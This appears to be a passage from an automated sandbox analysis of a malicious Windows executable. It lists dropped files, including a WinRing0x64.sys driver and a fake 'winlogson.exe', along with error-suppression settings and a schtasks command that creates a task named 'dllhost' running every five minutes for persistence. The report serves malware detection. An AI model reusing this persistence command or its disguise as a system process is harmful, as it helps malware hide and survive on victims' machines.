Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00452068 push ebx; ret	2_2_00452069
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00451100 pushfd ; retn 0041h	2_2_00451101
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00451D1A push es; retn 0042h	2_2_00452065
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_0045365F push esi; iretd	2_2_00453660
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CAC147 push ds; retf	2_2_00CAC148
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CAC131 push ds; retf	2_2_00CAC136
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CEDFCA push ecx; ret	2_2_00CEDFDD
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CAA775 push es; iretd	2_2_00CAA776
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04E16338 pushad ; ret	13_2_04E16341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08AB7730 pushfd ; iretd	13_2_08AB7731

Source: setupx 1.exe1.exe

Static PE information: section name: .text entropy: 7.09207256696417

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

File created: C:\ProgramData\Dllhost\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	File created: C:\ProgramData\Dllhost\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	File created: C:\ProgramData\Dllhost\winlogson.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	File created: C:\ProgramData\Dllhost\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	File created: C:\ProgramData\Dllhost\winlogson.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
